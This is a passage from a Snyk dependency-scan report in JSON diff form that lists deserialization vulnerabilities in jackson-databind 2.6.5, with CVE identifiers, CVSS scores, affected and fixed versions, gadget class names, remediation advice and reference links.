"isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": "https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + 